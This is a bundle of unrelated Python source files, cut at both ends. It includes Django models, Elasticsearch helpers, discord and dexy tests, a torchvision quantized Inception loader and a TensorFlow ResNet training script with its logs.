tk.Label(self.frame, text=self.text,
font=(font_name, self.FONT_SIZE)).grid(row=i, column=3, sticky="w")
tk.Label(self.frame, text=font_name,
font=(font_name, self.FONT_SIZE)).grid(row=i, column=4, sticky="w")
if __name__ == '__main__':
"""
1:familiesを対象、ラベルで実装。
2:familiesを対象、ラジオボタンで実装。ScrolledFrameを使用
3:pillowのtruetypeで実装。fontsフォルダを対象。
"""
switch = 2
text_ = input("\n表示したい文字を入力してください(何も入力しなければ「sample サンプル」と出ます)\n >")
font_size = input("フォントサイズを入力してください(何も入力しなければ「14ポイント」で出力します)\n >")
kwargs = {}
if text_: kwargs["text"] = text_
if font_size: kwargs["font_size"] = int(font_size)
a = FontLib(**kwargs)
if switch == 1:
# a.root.state("zoomed") # 最大化
a.font_list_by_label()
elif switch == 2:
# a.root.state("zoomed") # 最大化
a.font_list_radiobutton()
elif switch == 3:
a.font_list_from_dir()
else:
print("選択間違い")
sys.exit()
a.root.mainloop()
|
import discord
import pytest
import discord.ext.test as dpytest
@pytest.mark.asyncio
async def test_message(bot):
guild = bot.guilds[0]
channel = guild.text_channels[0]
await channel.send("Test Message")
@pytest.mark.asyncio
async def test_embed(bot):
guild = bot.guilds[0]
channel = guild.text_channels[0]
embed = discord.Embed(title="Test Embed")
embed.add_field(name="Field 1", value="Lorem ipsum")
await channel.send(embed=embed)
|
from django.db import models
from django.contrib.auth.models import (
AbstractBaseUser, BaseUserManager
)
import datetime
"""
CITIES AND COUNTRIES
1. cities = > name country longitude latitude
2. countries = > name iso1 iso2 phone currency
"""
class Country(models.Model):
name = models.CharField(max_length=255, null=False, blank=False)
currency = models.CharField(max_length=50, null=True, blank=True)
lang = models.CharField(max_length=50, null=True, blank=True)
class Meta:
verbose_name_plural = 'Countries'
def __str__(self):
return self.name
class City(models.Model):
name = models.CharField(max_length=255, null=False, blank=False)
country = models.ForeignKey(Country, on_delete=models.CASCADE)
class Meta:
verbose_name_plural = 'Cities'
def __str__(self):
return self.name
class Request_Category(models.Model):
name = models.CharField(max_length=255, null=False, blank=False)
class Meta:
verbose_name_plural = 'Request Categories'
def __str__(self):
return self.name
"""
USER MODEL AND USER MANAGER
1.before any migrations comment two lines
'admin/' link from main url
'django.contrib.admin', from Installed apps in main settings
"""
class UserManager(BaseUserManager):
def create_user(self, email, password=None):
""" Creates and saves a User with the given email and password. """
if not email:
raise ValueError('Users must have an email address')
user = self.model(
email=self.normalize_email(email),
)
user.set_password(password)
user.save(using=self._db)
return user
def create_staffuser(self, email, password):
""" Creates and saves a staff user with the given email and password. """
user = self.create_user(
email,
password=password,
)
user.is_staff = True
user.save(using=self._db)
return user
def create_superuser(self, email, password):
""" Creates and saves a superuser with the given email and password. """
user = self.create_user(
email,
password=password,
)
user.is_staff = True
user.is_admin = True
user.save(using=self._db)
return user
class Account(AbstractBaseUser):
image_height = models.PositiveIntegerField(null=True, blank=True, editable=False, default="150")
image_width = models.PositiveIntegerField(null=True, blank=True, editable=False, default="150")
full_name = models.CharField(max_length=255)
profile = models.ImageField(
upload_to='images/profiles/',
height_field='image_height', width_field='image_width',
default='images/profiles/user-blank-image.png',
help_text="Profile Picture", verbose_name="Profile Picture"
)
code = models.CharField(max_length=255, null=True, blank=True)
about = models.TextField(null=True, blank=True)
email = models.EmailField(
verbose_name='email address',
max_length=255,
unique=True,
)
phone = models.CharField(max_length=255, unique=True, blank=True, null=True)
whatsapp = models.CharField(max_length=255, blank=True, null=True)
facebook = models.CharField(max_length=255, blank=True, null=True)
instagram = models.CharField(max_length=255, blank=True, null=True)
address = models.TextField(blank=True, null=True)
country = models.ForeignKey(Country, on_delete=models.SET_NULL, blank=True, null=True)
city = models.ForeignKey(City, on_delete=models.SET_NULL, blank=True, null=True)
points = models.IntegerField(default=0, blank=True, null=True)
requests = models.IntegerField(default=0, blank=True, null=True)
responses = models.IntegerField(default=0, blank=True, null=True)
hearts = models.IntegerField(default=0, blank=True, null=True)
subscribers = models.IntegerField(default=0, blank=True, null=True)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False) # a admin user; non super-user
is_admin = models.BooleanField(default=False) # a superuser
created = models.DateTimeField(auto_now_add=True, auto_now=False)
updated = models.DateTimeField(auto_now=True, auto_now_add=False)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = [] # Email & Password are required by default.
def get_full_name(self):
# The user is identified by their email address
return self.email
def __unicode__(self):
return "{0}".format(self.profile)
def get_short_name(self):
# The user is identified by their email address
return self.email
def __str__(self): # __unicode__ on Python 2
return self.email
def has_perm(self, perm, obj=None):
return self.is_admin
def has_module_perms(self, app_label):
return True
"""
REQUEST, RESPONSE AND QUEUE MODELS AND MANAGERS
"""
class Request_Status(models.Model):
name = models.CharField(max_length=50, null=False, blank=False)
class Meta:
verbose_name_plural = 'Request Status'
def __str__(self):
return self.name
class Request(models.Model):
desc = models.TextField(null=False, blank=False)
request_category = models.ForeignKey(Request_Category, on_delete=models.DO_NOTHING)
address = models.CharField(max_length=255, null=False, blank=False)
city = models.ForeignKey(City, on_delete=models.DO_NOTHING)
country = models.ForeignKey(Country, on_delete=models.DO_NOTHING, null=True, blank=True)
supply = models.BooleanField(default=False)
user = models.ForeignKey(Account, on_delete=models.DO_NOTHING, null=True, blank=True)
accepted = models.BooleanField(default=False)
delivered = models.BooleanField(default=False)
active = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True, auto_now=False)
updated = models.DateTimeField(auto_now_add=False, auto_now=True)
class Meta:
verbose_name_plural = 'Requests'
def __str__(self):
return str(self.id)
class Request_Images(models.Model):
request = models.ForeignKey(Request, on_delete=models.CASCADE)
image = models.ImageField(upload_to='images/requests/')
class Meta:
verbose_name_plural = 'Cities'
def __str__(self):
return self.image.name + ' of ' + self.request
class Response(models.Model):
request = models.ForeignKey(Request, on_delete=models.CASCADE)
user = models.ForeignKey(Account, on_delete=models.CASCADE)
desc = models.TextField(null=True, blank=True)
request_points = models.IntegerField(default=0, null=True, blank=True)
shipment_points = models.IntegerField(default=0, null=True, blank=True)
other_points = models.IntegerField(default=0, null=True, blank=True)
active = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True, auto_now=False)
updated = models.DateTimeField(auto_now_add=False, auto_now=True)
class Meta:
verbose_name_plural = 'Responses'
def __str__(self):
return str(self.id)
class Queue(models.Model):
request = models.ForeignKey(Request, on_delete=models.CASCADE)
user = models.ForeignKey(Account, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
updated = models.DateTimeField(auto_now=True, auto_now_add=False)
class Meta:
verbose_name_plural = 'Queues'
def __str__(self):
return str(self.id)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import json
from os import path
import requests
from settings import ES_HOST as HOST
from settings import INDEX
# (unguarded) singleton for lazy init
MAPPINGS = None
def delete_index(host, index_name):
index_res = requests.delete(path.join(host, index_name))
if not index_res.status_code == 200:
err = u'index_res: {0} - {1}'.format(index_res, index_res.text)
raise Exception(err)
return index_res
def create_index(host, index_name, config):
"""
Create an ES index with the (json) configuration
"""
index_res = requests.post(path.join(host, index_name),
data=json.dumps(config))
if not index_res.status_code == 200:
err = u'index_res: {0} - {1}'.format(index_res, index_res.text)
raise Exception(err)
return
def flush_index(host, index_name):
return requests.post(path.join(host, index_name, '_flush'))
def get_mappings(host):
global MAPPINGS
if not MAPPINGS:
maps_url = path.join(host, INDEX, '_mapping')
res = requests.get(maps_url)
MAPPINGS = res.json()[INDEX]["mappings"]
return MAPPINGS
def get_id_path(host, doc_type):
return get_mappings(host)[doc_type]["_id"]["path"]
def get_doc_id(host, doc, doc_type):
ptr = doc
for tag in get_id_path(host, doc_type).split('.'):
ptr = ptr[tag]
return ptr
def index_doc(host, index_name, type_name, doc, parent_id=None):
"""
indexes the document into the named index and type_name
returns the ES assigned _id
"""
index_url = path.join(host, index_name, type_name)
params = {}
if parent_id:
params['parent'] = parent_id
if type(doc) is dict:
doc = json.dumps(doc)
index_res = requests.post(index_url, data=doc, params=params)
if not index_res.status_code == 201:
msg = u'index_url: {0}\n'.format(index_url)
msg += u'doc: {0}\n'.format(doc)
msg += u'index_res: {0} - {1}\n'.format(index_res, index_res.text)
print(msg)
raise Exception(msg)
return index_res.json()['_id']
def search(host, index_name, type_name, crit):
def build_bool_list(criteria, must=None):
"""
recursive function to build a must, should, or must_not list in a bool
"""
if must is None:
must = []
if type(criteria) is dict:
must.append(criteria)
elif type(criteria) is list:
for criterion in criteria:
build_bool_list(criterion, must)
else:
raise Exception(u'criteria {0} not list or dict'.format(criteria))
return must
search_url = path.join(host, index_name, type_name, '_search') + '?pretty'
# print(u'search_url: {0}'.format(search_url))
# print(u'crit: {0}'.format(crit))
query = {"query": {"bool": {"must": build_bool_list(crit)}}}
# print(u'query: {0}'.format(query))
# print(u'query: {0}'.format(json.dumps(query, indent=2)))
res = requests.post(search_url, data=json.dumps(query))
if res.status_code != 200:
print(u'query: {0}'.format(json.dumps(query, indent=2)))
raise Exception(u'search failure: {0}'.format(res.text))
docs = map(
lambda _ref: _ref['_source'],
res.json()['hits']['hits'])
# print(u'docs: {0}'.format(json.dumps(docs, indent=2)))
return docs
|
import Core.Projection as core
import numpy as np
def getRaw2D(points, view):
points2d = []
for el in points:
points2d.append(el.get2d(view))
raw = []
for el in points2d:
raw.append([el.x, el.y])
return np.array(raw, dtype=np.int64)
class AnchorPointsManager:
def __init__(self, callback):
self.anchors = []
self.callback = callback
def reset(self):
self.anchors = []
self.callback()
def apply(self, slice, coord_1, coord_2):
point2d = core.point2d(coord_1, coord_2, slice.view)
point3d = point2d.to3d(slice.slider.getIndex())
self.reset()
self.anchors.append(point3d)
self.callback()
def getRaw3D(self):
raw = []
for el in self.anchors:
raw.append([el.x, el.y, el.z])
return np.array(raw, dtype=np.int64)
def getRaw2D(self, view):
return getRaw2D(self.anchors, view)
|
from compas_ags.diagrams import FormDiagram
from compas_ags.diagrams import ForceDiagram
from compas_igs.rhino import Scene
from compas.rpc import Proxy
import compas_rhino
from compas_igs.utilities import compute_force_drawinglocation
from compas_igs.utilities import compute_force_drawingscale
from compas_igs.utilities import compute_form_forcescale
proxy = Proxy()
proxy.restart_server()
proxy.package = "compas_ags.ags.graphstatics"
formad = '/Users/mricardo/Desktop/form.json'
forcead = '/Users/mricardo/Desktop/force.json'
form = FormDiagram.from_json(formad)
#force = ForceDiagram.from_json(forcead)
#form.dual = force
#force.dual = form
scene = Scene()
form_id = scene.add(form, name='Form', layer='IGS::FormDiagram')
form = scene.find(form_id)
forcediagram = ForceDiagram.from_formdiagram(form.diagram)
force_id = scene.add(forcediagram, name="Force", layer="IGS::ForceDiagram")
force = scene.find(force_id)
force.diagram.data = proxy.force_update_from_form_proxy(force.diagram.data, form.diagram.data)
force.scale = compute_force_drawingscale(form, force)
force.location = compute_force_drawinglocation(form, force)
form.settings['scale.forces'] = compute_form_forcescale(form)
force.diagram.constraints_from_dual()
scene.update()
compas_rhino.rs.GetReal('wite a number', 0)
form.diagram.data, force.diagram.data = proxy.update_diagrams_from_constraints_proxy(form.diagram.data, force.diagram.data)
scene.update()
|
from unittest import TestCase
from Interpretator import *
class InterpretatorTest(TestCase):
def testEmpty(self):
pass
|
#!/usr/bin/env python
"""
@file coi-services/mi/idk/platform/driver_generator.py
@author Bill French
@brief Generate directory structure and code stubs for a driver
"""
__author__ = 'Bill French'
__license__ = 'Apache 2.0'
import os
import sys
import re
from string import Template
import random
import string
import shutil
from mi.core.log import get_logger ; log = get_logger()
from mi.idk import prompt
from mi.idk.config import Config
from mi.idk.platform.metadata import Metadata
import mi.idk.driver_generator
from mi.idk.exceptions import DriverParameterUndefined
from mi.idk.exceptions import MissingTemplate
class DriverGenerator(mi.idk.driver_generator.DriverGenerator):
"""
Generate driver code, tests and directory structure
"""
###
# Configurations
###
def driver_base_dir(self):
"""
@brief full path to the driver make dir
@retval driver make path
"""
if not self.metadata.driver_path:
log.info("metadata is %s", self.metadata)
raise DriverParameterUndefined("driver_path undefined in metadata")
return os.path.join(Config().base_dir(),
"mi", "platform", "driver")
def driver_dir(self):
"""
@brief full path to the driver code
@retval driver path
"""
if not self.metadata.driver_path:
raise DriverParameterUndefined("driver_path undefined in metadata")
return os.path.join(self.driver_base_dir(),self.metadata.driver_path)
def template_dir(self):
"""
@brief path to the driver template dir
@retval driver test code template path
"""
return os.path.join(Config().template_dir(), 'platform')
def driver_name_camelcase(self):
"""
@brief full instrument name with first letter capitalized
@retval full instrument name with first letter capitalized
"""
return string.capwords(self.metadata.driver_name, '_').replace('_','')
###
# Private Methods
###
def __init__(self, metadata, force = False):
"""
@brief Constructor
@param metadata IDK Metadata object
"""
mi.idk.driver_generator.DriverGenerator.__init__(self, metadata, force)
self.metadata = metadata
self.force = force
def _driver_template_data(self):
"""
@brief dictionary containing a map of substitutions for the driver code generation
@retval data mapping for driver generation
"""
return {
'driver_module': self.driver_modulename(),
'file': self.driver_relative_path(),
'author': self.metadata.author,
'driver_name': self.metadata.driver_name,
'driver_path': self.metadata.driver_path,
'release_notes': self.metadata.notes,
'constructor': self.metadata.constructor,
'full_instrument_lower': self.metadata.driver_name.lower(),
'full_instrument_camelcase': self.driver_name_camelcase(),
}
def _test_template_data(self):
"""
@brief dictionary containing a map of substitutions for the driver test code generation
@retval data mapping for driver test generation
"""
chars=string.ascii_uppercase + string.digits
id = ''.join(random.choice(chars) for x in range(6))
return {
'test_module': self.test_modulename(),
'driver_module': self.driver_modulename(),
'driver_dir': self.driver_dir(),
'file': self.driver_relative_path(),
'author': self.metadata.author,
'driver_name': self.metadata.driver_name,
'constructor': self.metadata.constructor,
'full_instrument_lower': self.metadata.driver_name.lower(),
'full_instrument_camelcase': self.driver_name_camelcase(),
}
def create_init_files(self):
path = self.driver_test_dir()
p = os.path.join(self.metadata.driver_path, 'test')
for part in p.split('/'):
self._touch_init(path)
path = os.path.join(path, '..')
|
from dexy.exceptions import UserFeedback
from dexy.filters.git import repo_from_path
from dexy.filters.git import repo_from_url
from dexy.filters.git import generate_commit_info
from tests.utils import assert_in_output
from tests.utils import runfilter
from tests.utils import tempdir
from nose.exc import SkipTest
import os
import json
REMOTE_REPO_HTTPS = "https://github.com/ananelson/dexy-templates"
PATH_TO_LOCAL_REPO = os.path.expanduser("~/dev/testrepo")
# TODO use subprocess to check out a repo to a temp dir, or have a repo in data
# dir, or use [gasp] submodules.
try:
import pygit2
import urllib
no_local_repo = not os.path.exists(PATH_TO_LOCAL_REPO)
try:
urllib.urlopen("http://google.com")
no_internet = False
except IOError:
no_internet = True
if no_local_repo:
SKIP = (True, "No local repo at %s." % PATH_TO_LOCAL_REPO)
elif no_internet:
SKIP = (True, "Internet not available.")
else:
SKIP = (False, None)
except ImportError:
SKIP = (True, "pygit2 not installed")
def skip():
if SKIP[0]:
raise SkipTest(SKIP[1])
skip()
def test_run_gitrepo():
with runfilter("repo", REMOTE_REPO_HTTPS) as doc:
assert len(doc.wrapper.nodes) > 20
def test_generate_commit_info():
repo, remote = repo_from_url(REMOTE_REPO_HTTPS)
refs = repo.listall_references()
ref = repo.lookup_reference(refs[0])
commit = repo[ref.target]
commit_info = generate_commit_info(commit)
assert commit_info['author-name'] == "Ana Nelson"
assert commit_info['author-email'] == "ana@ananelson.com"
def test_git_commit():
with runfilter("gitcommit", REMOTE_REPO_HTTPS) as doc:
output = doc.output_data()
patches = json.loads(output['patches'])
assert output['author-name'] == "Ana Nelson"
assert output['author-email'] == "ana@ananelson.com"
#assert output['message'] == "Add README file."
#assert output['hex'] == "2f15837e64a70e4d34b924f6f8c371a266d16845"
def test_git_log():
assert_in_output("gitlog", PATH_TO_LOCAL_REPO,
"Add README file.")
def test_git_log_remote():
assert_in_output("gitlog", REMOTE_REPO_HTTPS,
"Rename")
def test_repo_from_url():
repo, remote = repo_from_url(REMOTE_REPO_HTTPS)
assert remote.name == 'origin'
assert remote.url == REMOTE_REPO_HTTPS
def test_repo_from_path():
repo, remote = repo_from_path(PATH_TO_LOCAL_REPO)
assert ".git" in repo.path
#assert isinstance(repo.head, pygit2.Object)
# assert "README" in repo.head.message
def test_repo_from_invalid_path():
with tempdir():
try:
repo, remote = repo_from_path(".")
assert False
except UserFeedback as e:
assert "no git repository was found at '.'" in str(e)
def test_run_git():
with runfilter("git", PATH_TO_LOCAL_REPO) as doc:
doc.output_data()
def test_run_git_remote():
with runfilter("git", REMOTE_REPO_HTTPS) as doc:
doc.output_data()
|
import warnings
from functools import partial
from typing import Any, Optional, Union
from torchvision.transforms.functional import InterpolationMode
from ....models.quantization.inception import (
QuantizableInception3,
_replace_relu,
quantize_model,
)
from ...transforms.presets import ImageNetEval
from .._api import Weights, WeightEntry
from .._meta import _IMAGENET_CATEGORIES
from ..inception import InceptionV3Weights
__all__ = [
"QuantizableInception3",
"QuantizedInceptionV3Weights",
"inception_v3",
]
class QuantizedInceptionV3Weights(Weights):
ImageNet1K_FBGEMM_TFV1 = WeightEntry(
url="https://download.pytorch.org/models/quantized/inception_v3_google_fbgemm-71447a44.pth",
transforms=partial(ImageNetEval, crop_size=299, resize_size=342),
meta={
"size": (299, 299),
"categories": _IMAGENET_CATEGORIES,
"interpolation": InterpolationMode.BILINEAR,
"backend": "fbgemm",
"quantization": "ptq",
"recipe": "https://github.com/pytorch/vision/tree/main/references/classification#post-training-quantized-models",
"unquantized": InceptionV3Weights.ImageNet1K_TFV1,
"acc@1": 77.176,
"acc@5": 93.354,
},
)
def inception_v3(
weights: Optional[Union[QuantizedInceptionV3Weights, InceptionV3Weights]] = None,
progress: bool = True,
quantize: bool = False,
**kwargs: Any,
) -> QuantizableInception3:
if "pretrained" in kwargs:
warnings.warn("The argument pretrained is deprecated, please use weights instead.")
if kwargs.pop("pretrained"):
weights = (
QuantizedInceptionV3Weights.ImageNet1K_FBGEMM_TFV1 if quantize else InceptionV3Weights.ImageNet1K_TFV1
)
else:
weights = None
if quantize:
weights = QuantizedInceptionV3Weights.verify(weights)
else:
weights = InceptionV3Weights.verify(weights)
original_aux_logits = kwargs.get("aux_logits", False)
if weights is not None:
if "transform_input" not in kwargs:
kwargs["transform_input"] = True
kwargs["aux_logits"] = True
kwargs["num_classes"] = len(weights.meta["categories"])
if "backend" in weights.meta:
kwargs["backend"] = weights.meta["backend"]
backend = kwargs.pop("backend", "fbgemm")
model = QuantizableInception3(**kwargs)
_replace_relu(model)
if quantize:
quantize_model(model, backend)
if weights is not None:
if quantize and not original_aux_logits:
model.aux_logits = False
model.AuxLogits = None
model.load_state_dict(weights.state_dict(progress=progress))
if not quantize and not original_aux_logits:
model.aux_logits = False
model.AuxLogits = None
return model
|
# TEST GPU SET UP via commands
'''
run commands below:
1. nvcc -V --> nvidia cuda compiler driver
2. nvidia-smi --> about GPU
cudNN version can be found at C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v10.1\include\cudnn.h as below:
#define CUDNN_MAJOR 7
#define CUDNN_MINOR 6
#define CUDNN_PATCHLEVEL 5
'''
# TEST GPU SET UP via tendorflow
import tensorflow as tf
# check tf version
tf.__version__
# is cuda installed ?
tf.test.is_built_with_cuda()
# test whether GPU is available
tf.test.is_gpu_available(cuda_only=False, min_cuda_compute_capability=None)
# physical_device name
tf.config.list_physical_devices('GPU')
# number of GPU's available
len(tf.config.experimental.list_physical_devices('GPU'))
# code to confirm tensorflow is using GPU
tf.config.experimental.list_physical_devices('GPU')
# CONFIG GPU
from tensorflow._api.v2.compat.v1 import ConfigProto
from tensorflow._api.v2.compat.v1 import InteractiveSession
# avoid using 100% of GPU, else GPU overclock.
config = ConfigProto()
# use 50% of the GPU memory
config.gpu_options.per_process_gpu_memory_fraction = 0.5
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
# BEGIN THE PROGRAM
# import the lib's
from tensorflow.keras.layers import Dense, Flatten
from tensorflow.keras.models import Model
from tensorflow.keras.applications import ResNet152V2
from tensorflow.keras.applications.resnet50 import preprocess_input
from glob import glob
# re-size all the images to this
IMAGE_SIZE = [224, 224]
train_path = 'dataset/train'
valid_path = 'dataset/test'
# use imagenet weights i,e download weight file from https://storage.googleapis.com/tensorflow/keras-applications/resnet/resnet152v2_weights_tf_dim_ordering_tf_kernels_notop.h5
resnet = ResNet152V2(input_shape=IMAGE_SIZE + [3], weights='imagenet', include_top=False)
# not to train existing weights
for layer in resnet.layers:
layer.trainable = False
# get no of output classes
total_no_of_classes = glob('dataset/train/*')
# flatten all the layers
x = Flatten()(resnet.output)
output_layer = Dense(len(total_no_of_classes), activation='softmax')(x)
# create object for the model
resnet_model = Model(inputs=resnet.input, outputs=output_layer)
# show model architecture
resnet_model.summary()
# inform model about cost and optimization method to use
resnet_model.compile(
loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
# utilize 'Image Data Generator' for importing images from the dataset
from tensorflow.keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
# give same target size as input size for the images
training_set = train_datagen.flow_from_directory('dataset/train',
target_size = (224, 224),
batch_size = 32,
class_mode = 'categorical')
test_set = test_datagen.flow_from_directory('dataset/test',
target_size = (224, 224),
batch_size = 32,
class_mode = 'categorical')
# run the resnet model
result = resnet_model.fit(
training_set,
validation_data=test_set,
epochs=20,
steps_per_epoch=len(training_set),
validation_steps=len(test_set)
)
import matplotlib.pyplot as plt
# plot the loss
plt.plot(result.history['loss'], label='train loss')
plt.plot(result.history['val_loss'], label='val loss')
plt.legend()
plt.show()
plt.savefig('LossVal_loss_ResNet152V2')
# plot the accuracy
plt.plot(result.history['accuracy'], label='train acc')
plt.plot(result.history['val_accuracy'], label='val acc')
plt.legend()
plt.show()
plt.savefig('AccVal_acc_ResNet152V2')
# save resnet50 model to local
resnet_model.save('resnet152V2_model.h5')
# prediction for testset
predict_new = resnet_model.predict(test_set)
predict_new
import numpy as np
# take argmax on testset i,e on all images
predict_new = np.argmax(predict_new, axis=1)
predict_new
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
# load model from local
model=load_model('resnet152V2_model.h5')
# load new image
new_image = image.load_img('dataset/test/fresh cotton leaf/d (378).jpg',target_size=(224,224))
# convert PIL image type to array
new_image_array = image.img_to_array(new_image)
new_image_array.shape
# normalize
new_image_array=new_image_array/255
import numpy as np
# add additional dim for input of the NN
new_image_array=np.expand_dims(new_image_array,axis=0)
# https://stackoverflow.com/questions/47555829/preprocess-input-method-in-keras/47556342
new_image_array_with_new_added_dim =preprocess_input(new_image_array)
new_image_array_with_new_added_dim.shape
# predict new image
model.predict(new_image_array_with_new_added_dim)
# argmax on predicted image
maxVoter=np.argmax(model.predict(new_image_array_with_new_added_dim), axis=1)
maxVoter==2
# true
'''
61/61 [==============================] - 24s 395ms/step - accuracy: 0.8324 - loss: 1.2957 - val_loss: 0.3694 - val_accuracy: 0.9444
Epoch 2/20
61/61 [==============================] - 20s 332ms/step - accuracy: 0.9313 - loss: 0.4453 - val_loss: 0.3510 - val_accuracy: 0.8889
Epoch 3/20
61/61 [==============================] - 21s 340ms/step - accuracy: 0.9441 - loss: 0.3790 - val_loss: 0.6043 - val_accuracy: 0.9444
Epoch 4/20
61/61 [==============================] - 20s 321ms/step - accuracy: 0.9462 - loss: 0.4484 - val_loss: 0.2590 - val_accuracy: 0.9444
Epoch 5/20
61/61 [==============================] - 20s 323ms/step - accuracy: 0.9600 - loss: 0.3198 - val_loss: 0.1842 - val_accuracy: 0.9444
Epoch 6/20
61/61 [==============================] - 20s 325ms/step - accuracy: 0.9549 - loss: 0.3837 - val_loss: 1.3335 - val_accuracy: 0.9444
Epoch 7/20
61/61 [==============================] - 20s 321ms/step - accuracy: 0.9544 - loss: 0.3626 - val_loss: 0.8762 - val_accuracy: 0.9444
Epoch 8/20
61/61 [==============================] - 20s 323ms/step - accuracy: 0.9600 - loss: 0.3469 - val_loss: 0.2045 - val_accuracy: 0.9444
Epoch 9/20
61/61 [==============================] - 20s 336ms/step - accuracy: 0.9672 - loss: 0.2943 - val_loss: 5.9072e-06 - val_accuracy: 1.0000
Epoch 10/20
61/61 [==============================] - 20s 334ms/step - accuracy: 0.9723 - loss: 0.2769 - val_loss: 4.0530e-06 - val_accuracy: 1.0000
Epoch 11/20
61/61 [==============================] - 21s 339ms/step - accuracy: 0.9713 - loss: 0.2478 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 12/20
61/61 [==============================] - 21s 344ms/step - accuracy: 0.9851 - loss: 0.1030 - val_loss: 6.6227e-09 - val_accuracy: 1.0000
Epoch 13/20
61/61 [==============================] - 20s 335ms/step - accuracy: 0.9841 - loss: 0.1818 - val_loss: 0.0014 - val_accuracy: 1.0000
Epoch 14/20
61/61 [==============================] - 21s 342ms/step - accuracy: 0.9851 - loss: 0.1116 - val_loss: 3.1127e-07 - val_accuracy: 1.0000
Epoch 15/20
61/61 [==============================] - 21s 346ms/step - accuracy: 0.9836 - loss: 0.2131 - val_loss: 0.1223 - val_accuracy: 0.9444
Epoch 16/20
61/61 [==============================] - 21s 338ms/step - accuracy: 0.9862 - loss: 0.1407 - val_loss: 1.1855e-06 - val_accuracy: 1.0000
Epoch 17/20
61/61 [==============================] - 21s 345ms/step - accuracy: 0.9790 - loss: 0.1318 - val_loss: 1.3245e-08 - val_accuracy: 1.0000
Epoch 18/20
61/61 [==============================] - 21s 345ms/step - accuracy: 0.9795 - loss: 0.1567 - val_loss: 8.4108e-07 - val_accuracy: 1.0000
Epoch 19/20
61/61 [==============================] - 21s 343ms/step - accuracy: 0.9831 - loss: 0.1475 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 20/20
61/61 [==============================] - 21s 352ms/step - accuracy: 0.9810 - loss: 0.2066 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
inceptionv3 gave accuracy 0.94.
'''
'''
Error's come accrossed:
1. ImportError: Could not import PIL.Image. The use of `load_img` requires PIL.
solution: pip install --upgrade keras numpy pandas sklearn pillow (https://github.com/asataniAIR/Image_DL_Tutorial/issues/4)
2. Internal: Invoking GPU asm compilation is supported on Cuda non-Windows platforms onlyRelying on driver to perform ptx compilation. Modify $PATH to customize ptxas location.
ref: https://github.com/tensorflow/models/issues/7640
3. could not synchronize on CUDA context: CUDA_ERROR_ILLEGAL_ADDRESS: an illegal memory access was encountered :: 0x00007FFE2B93BA05 tensorflow::CurrentStackTrace. GPU sync failed
solution: restart the program. (https://stackoverflow.com/questions/51112126/gpu-sync-failed-while-using-tensorflow)
''' |
import asyncio
import inspect
async def main():
pass
print(type(main))
print(inspect.iscoroutinefunction(main))
print(type(main()))
print(dir(main()))
|
from typing import Iterable
from django.db import models
from django.contrib.auth.models import User
class Player(models.Model):
address = models.CharField(max_length=200)
city = models.CharField(max_length=200)
state = models.CharField(max_length=2)
zipcode = models.CharField(max_length=10)
home_phone = models.CharField(max_length=20, blank=True)
work_phone = models.CharField(max_length=20, blank=True)
cell_phone = models.CharField(max_length=20, blank=True)
paper_mail = models.BooleanField()
user = models.OneToOneField(User, on_delete=models.CASCADE)
def name(self):
return str(self.user.first_name + ' ' + self.user.last_name)
def __str__(self):
return self.name()
class Season(models.Model):
year = models.IntegerField()
player = models.ForeignKey(Player, on_delete=models.CASCADE)
def doubles(self):
self.doublesA + self.doublesB
def __str__(self):
return f'{self.player}({self.year})'
class Divisions(models.IntegerChoices):
HIGH_ADVANCED = 1
ADVANCED = 2
HIGH_INTERMEDIATE = 3
INTERMEDIATE = 4
LOW_INTERMEDIATE = 5
BEGINNER = 6
@classmethod
def get_name(cls, index) -> str:
for i, name in cls.choices:
if i == index:
return name
return ''
class Singles(models.Model):
player = models.ForeignKey(Season, on_delete=models.CASCADE)
division = models.IntegerField(choices=Divisions.choices)
def player_name(self):
return self.player.player
def year(self):
return self.player.year
def __str__(self):
return f'{self.player} - {Divisions.get_name(self.division)}'
class Doubles(models.Model):
playerA = models.ForeignKey(Season, on_delete=models.CASCADE, related_name='doublesA')
playerB = models.ForeignKey(Season, on_delete=models.CASCADE, related_name='doublesB')
division = models.IntegerField(choices=Divisions.choices)
def player_name(self):
return f'{self.playerA.player}/{self.playerB.player}'
def year(self):
return self.playerA.year
def __str__(self):
return f'{self.playerA.player}/{self.playerB.player}({self.playerA.year}) - {Divisions.get_name(self.division)}'
class GenericMatch(models.Model):
HOME = "H"
AWAY = "A"
VICTOR = [
(HOME, 'Home'),
(AWAY, 'Away'),
]
forfeitWin = models.CharField(
max_length=1,
choices=VICTOR,
null=True
)
class Meta:
abstract = True
def sets(self) -> Iterable['MatchSet']:
return []
class SinglesMatch(GenericMatch):
home = models.ForeignKey(Singles, on_delete=models.CASCADE, related_name='home_matches')
away = models.ForeignKey(Singles, on_delete=models.CASCADE, related_name='away_matches')
def __str__(self):
return f'{self.home.player} v {self.away.player}'
def sets(self):
return self.singleset_set.all()
class DoublesMatch(GenericMatch):
home = models.ForeignKey(Doubles, on_delete=models.CASCADE, related_name='home_matches')
away = models.ForeignKey(Doubles, on_delete=models.CASCADE, related_name='away_matches')
def __str__(self):
return f'{self.home.playerA.player}/{self.home.playerB.player} v {self.away.playerA.player}/{self.away.playerB.player}'
def sets(self):
return self.doubleset_set.all()
class MatchSet(models.Model):
home = models.IntegerField(null=True)
away = models.IntegerField(null=True)
tie_break_home = models.IntegerField(null=True)
tie_break_away = models.IntegerField(null=True)
set_number = models.IntegerField()
class Meta:
abstract = True
class SingleSet(MatchSet):
match = models.ForeignKey(SinglesMatch, on_delete=models.CASCADE)
class DoubleSet(MatchSet):
match = models.ForeignKey(DoublesMatch, on_delete=models.CASCADE)
class ScoreKeepers(models.Model):
